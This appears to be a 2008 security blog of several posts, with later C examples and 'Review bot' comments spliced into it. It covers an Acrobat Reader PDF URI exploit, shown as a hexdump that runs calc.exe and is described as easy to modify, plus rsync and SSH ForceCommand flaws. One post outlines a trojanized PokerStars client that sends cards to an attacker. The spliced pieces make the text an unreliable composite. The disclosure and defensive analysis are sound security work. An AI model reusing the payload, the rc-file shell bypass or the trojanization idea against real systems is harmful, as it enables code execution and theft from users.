Thursday, April 24, 2008

Interesting "feature" of AcroRead

Acroread 8 is vulnerable to command execution: the URI tag of a link action can be given a local path, and the file it points to gets executed.
get the exploit
This exploit runs the Windows calculator, but it can be modified easily:

00000f30 20 6f 62 6a 0d 3c 3c 2f 55 52 49 28 6d 61 69 6c | obj.<</URI(mail|
00000f40 74 6f 3a 74 65 73 74 25 2e 2e 2f 2e 2e 2f 2e 2e |to:test%../../..|
00000f50 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f |/../../../../../|
00000f60 77 69 6e 64 6f 77 73 2f 73 79 73 74 65 6d 33 32 |windows/system32|
00000f70 2f 63 61 6c 63 2e 65 78 65 22 2e 63 6d 64 29 2f |/calc.exe".cmd)/|
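As an added example (not part of the original post, and not Adobe's or the exploit's code), here is a small C scanner that walks a PDF byte buffer, pulls out every /URI(...) action string and flags targets that look like local paths rather than URLs: a `../` or `..\` traversal step, a quote character, whitespace, or any byte outside printable ASCII. The sample PDF fragment and the example.com addresses are constructed for the demo; its third object carries the URI string from the hexdump above, which a scheme-only check would accept because it begins with mailto:.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, constructed for this post (not Adobe's code and not the
 * exploit's code): find /URI(...) actions in a PDF and flag targets that
 * look like local paths instead of URLs. */

/* Return 1 if a URI target is suspicious: it contains a "../" or "..\"
 * traversal step, a quote, whitespace, or any byte outside printable ASCII,
 * none of which belong in a well-formed URI. Return 0 otherwise. */
int uri_is_suspicious(const char *uri, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)uri[i];
        if (c == '"' || c <= 0x20 || c > 0x7e)
            return 1;
        if (c == '.' && i + 2 < len && uri[i + 1] == '.' &&
            (uri[i + 2] == '/' || uri[i + 2] == '\\'))
            return 1;
    }
    return 0;
}

/* Scan a PDF buffer for every "/URI(" literal string. PDF literal strings
 * end at the first ')' that is not preceded by a backslash escape.
 * Stores the number of URI actions found in *total and returns how many
 * of them uri_is_suspicious() flagged. */
int scan_pdf_uris(const unsigned char *buf, size_t n, int *total)
{
    static const char key[] = "/URI(";
    const size_t klen = sizeof(key) - 1;
    size_t i = 0;
    int bad = 0;

    *total = 0;
    while (i + klen <= n) {
        size_t start, end;
        if (memcmp(buf + i, key, klen) != 0) {
            i++;
            continue;
        }
        start = i + klen;
        end = start;
        while (end < n && buf[end] != ')') {
            if (buf[end] == '\\' && end + 1 < n)
                end++;              /* skip the escaped character */
            end++;
        }
        if (end >= n)
            break;                  /* unterminated string: stop scanning */
        (*total)++;
        if (uri_is_suspicious((const char *)buf + start, end - start))
            bad++;
        i = end + 1;
    }
    return bad;
}

/* Constructed sample: two ordinary link actions and one carrying the URI
 * string shown in the hexdump above. The example.com targets are made up. */
const char sample_pdf[] =
    "%PDF-1.4\n"
    "1 0 obj<</S/URI/URI(http://example.com/manual.pdf)>>endobj\n"
    "2 0 obj<</S/URI/URI(mailto:support@example.com)>>endobj\n"
    "3 0 obj<</S/URI/URI(mailto:test%../../../../../../../../"
    "windows/system32/calc.exe\".cmd)>>endobj\n";

int main(void)
{
    int total = 0;
    int bad = scan_pdf_uris((const unsigned char *)sample_pdf,
                            sizeof(sample_pdf) - 1, &total);
    printf("%d URI action(s), %d suspicious\n", total, bad);
    return bad ? 1 : 0;
}
```

The scanner is deliberately byte-oriented: it does not parse PDF objects, so it also catches URI strings hidden in objects a real parser might skip, at the cost of missing strings written in hex (<...>) form or inside compressed object streams.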

Conclusion: don't trust any file given to you by unknown people :)

Monday, April 14, 2008

Rsync remote code execution

The rsync service with xattr support is vulnerable to remote code execution in versions between 2.6.9 and 3.0.1:

--- a/util.c
+++ b/util.c
@@ -1329,7 +1329,7 @@ void *_new_array(unsigned long num, unsigned int size, int use_calloc)
  return use_calloc ? calloc(num, size) : malloc(num * size);
-void *_realloc_array(void *ptr, unsigned int size, unsigned long num)
+void *_realloc_array(void *ptr, unsigned int size, size_t num)
  if (num >= MALLOC_MAX/size)
   return NULL;
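Review bot: the `_realloc_array()` prototype changes `num` from `unsigned long` to `size_t`, but this hunk touches only util.c and not the header that declares the function or the `realloc_array()` macro that wraps it; the declaration has to move in the same change or callers will be compiled against a mismatched signature. Also, the guard `if (num >= MALLOC_MAX/size)` divides by `size`, so a caller passing `size == 0` traps before any allocation happens; either reject `size == 0` explicitly or state in a comment that callers must pass a non-zero element size.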
@@ -1550,7 +1550,10 @@ void *expand_item_list(item_list *lp, size_t item_size,
    new_size += incr;
    new_size *= 2;
-  new_ptr = realloc_array(lp->items, char, new_size * item_size);
+  if (new_size < lp->malloced)
+   overflow_exit("expand_item_list");
+  /* Using _realloc_array() lets us pass the size, not a type. */
+  new_ptr = _realloc_array(lp->items, item_size, new_size);
   if (verbose >= 4) {
    rprintf(FINFO, "[%s] expand %s to %.0f bytes, did%s move\n",
     who_am_i(), desc, (double)new_size * item_size,
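Review bot: the new guard `if (new_size < lp->malloced) overflow_exit("expand_item_list");` detects a wrapped `new_size` only because `new_size` is derived from `lp->malloced` before the `new_size += incr;` / `new_size *= 2;` steps shown, and that initialisation sits outside the hunk; the comment should state that invariant so a reader does not have to infer why a smaller value means overflow. The switch to `_realloc_array(lp->items, item_size, new_size)` is the part that stops the product `new_size * item_size` from wrapping, since the multiplication now happens behind the `MALLOC_MAX/size` check instead of in the caller; saying so next to the call would make the intent clearer than "lets us pass the size, not a type".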

1. size_t

First there is the check if (num >= MALLOC_MAX/size): num*size has to be less than MALLOC_MAX.

Does this check have a sign problem?

rsync.h redefines size_t to unsigned int, so there is no problem, and the xattr patch doesn't change it to a signed type.

There is no sign problem here.

2. new_size < malloced

+ if (new_size < lp->malloced)
Now it is not possible to use this realloc to shrink the heap buffer lp->items!!!

3. supplying the fixed size instead of the type char

char is a *1 multiplier; I don't think this was a problem.

- new_ptr = realloc_array(lp->items, char, new_size * item_size);
+ new_ptr = _realloc_array(lp->items, item_size, new_size);

The first uses a macro that expands to:
_realloc_array(ptr, sizeof(char), new_size*item_size)

rsync.h:#define realloc_array(ptr, type, num) ((type*)_realloc_array((ptr), sizeof(type), (num)))

The second reallocates item_size*new_size.

The Problem

So the problem seems to be the size reduction, which was not controlled and let the lp->items array overflow.
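To make the fix concrete, here is an added C example (constructed for this post, not rsync's code) of the pattern the patch moves to: a checked realloc that refuses any num*size reaching a cap, and a doubling growth routine that rejects a wrapped size with the same `new_size < malloced` test. MALLOC_MAX's value, the item_list struct and all function names here are assumptions for the demo; try_grow() exercises a normal growth, a wrapped size and an over-cap request.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <limits.h>

/* Constructed example modelled on the rsync patch discussed above; it is
 * not rsync's code. MALLOC_MAX is an illustrative cap, not rsync's value. */
#define MALLOC_MAX 0x40000000u

typedef struct {
    void *items;
    size_t malloced;   /* items the buffer currently has room for */
    size_t count;      /* items in use */
} item_list;

/* Checked realloc: refuse when num*size would reach MALLOC_MAX (which also
 * rules out the multiplication wrapping) and when size is zero, because
 * the patch's own check divides by size. */
void *checked_realloc_array(void *ptr, size_t size, size_t num)
{
    if (size == 0 || num >= MALLOC_MAX / size)
        return NULL;
    return realloc(ptr, num * size);
}

/* Grow lp so that count + incr items fit, doubling as rsync does.
 * Returns 1 on success (lp updated) and 0 when the size wrapped or the
 * allocation was refused; lp is left untouched on failure. */
int grow_item_list(item_list *lp, size_t item_size, size_t incr)
{
    size_t new_size;
    void *new_ptr;

    /* count <= malloced always holds, so this subtraction cannot wrap. */
    if (incr <= lp->malloced - lp->count)
        return 1;                      /* enough room already */
    new_size = lp->malloced;
    new_size += incr;
    new_size *= 2;
    /* The patch's wrap test: an unsigned size that grew cannot be smaller
     * than the size it grew from. A wrapped value is rejected here instead
     * of shrinking the buffer while count keeps increasing. */
    if (new_size < lp->malloced)
        return 0;
    new_ptr = checked_realloc_array(lp->items, item_size, new_size);
    if (new_ptr == NULL)
        return 0;
    lp->items = new_ptr;
    lp->malloced = new_size;
    return 1;
}

/* Demo helper: start from a list whose `malloced` slots are all in use,
 * try to add incr items, and return the resulting capacity, or 0 when the
 * growth was refused. */
size_t try_grow(size_t malloced, size_t item_size, size_t incr)
{
    item_list lp = { NULL, malloced, malloced };
    size_t result = 0;
    if (grow_item_list(&lp, item_size, incr))
        result = lp.malloced;
    free(lp.items);
    return result;
}

int main(void)
{
    /* A capacity with the top bit set: adding one and doubling wraps. */
    size_t half = (size_t)1 << (sizeof(size_t) * CHAR_BIT - 1);
    printf("normal growth  -> %zu\n", try_grow(0, 16, 4));
    printf("wrapped size   -> %zu\n", try_grow(half, 16, 1));
    printf("over the cap   -> %zu\n", try_grow(0, 16, 0x10000000));
    return 0;
}
```

The wrapped-size case never reaches realloc: the doubled value comes out smaller than the old capacity and is rejected, which is exactly the shrink-then-overflow situation the post describes for the unpatched code.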

The Exploitation

More details about exploitation, soon.

Thursday, April 10, 2008

PokerStars Security

In this video we can see that the code is making a TCP connection to ... The SSL-encrypted connection to 445 can be redirected to my sha0proxy.pl.

PokerStars communication is secure because they check the certificates.

If we patch the call dword ptr DS:[7145C] (connect) to make our fake connection to the evil server, it will not work because of the certificate validation. But the cards can be sent to the evil host. The trojanized client can be distributed to the users.

Conclusion: software must always be downloaded from an official source, via a clear URL.

Wednesday, April 09, 2008

Plan9 Security

Plan9 is a new concept of operating system; I like it, but I am not confident about its security.

- It saves all the passwords used to connect to remote services in the cache.

- There are open grids; maybe they are vulnerable to some kind of worm, or can be used as DDoS platforms.

- When you type the password to log in to a remote file server, it is shown in plaintext on the screen.

- Plan9 services are vulnerable to stack attacks.

- plan9 Security
- plan9 Shellcode
- plan9 scheduler
- pegasus, plan9 webserver
- acid, plan9 debugger

I have recorded a video introducing the usage of the acid debugger.

Monday, April 07, 2008

SSH ForceCommand security flaw

ForceCommand is a sshd_config option that lets use the remote ssh to execute a restricted commands, for example vi somefile.

When a SSH session is started the ~/.ssh/rc shell script is executed, the user logged by ssh, has permissions to write into his own rc.

Then if we are allowed to make a vi somefile, we can write into ~/.ssh/rc and write a /bin/bash that will be spawned the next time we enter to the system.

The patch only lets the rc execution when ForceCommand is not enabled (options.adm_forced_command == NULL)

+++ usr.bin/ssh/session.c 27 Mar 2008 10:54:55 -0000
@@ -878,8 +878,9 @@
do_xauth =
s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL;

- /* ignore _PATH_SSH_USER_RC for subsystems */
- if (!s->is_subsystem && (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
+ /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */
+ if (!s->is_subsystem && options.adm_forced_command == NULL &&
+ (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
snprintf(cmd, sizeof cmd, "%s -c '%s %s'",
if (debug_flag)
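Review bot: the new condition `options.adm_forced_command == NULL` skips `_PATH_SSH_USER_RC` only for the administrator-forced command; please confirm that a ForceCommand set inside a Match block has already been copied into `options.adm_forced_command` by the time `do_xauth` is computed here, otherwise that configuration keeps running the user's rc. The sshd(8) description of `~/.ssh/rc` should also be updated to say the file is not executed when ForceCommand is in effect, since the changed comment "ignore _PATH_SSH_USER_RC for subsystems and admin forced commands" is the only record of the new behaviour in this hunk.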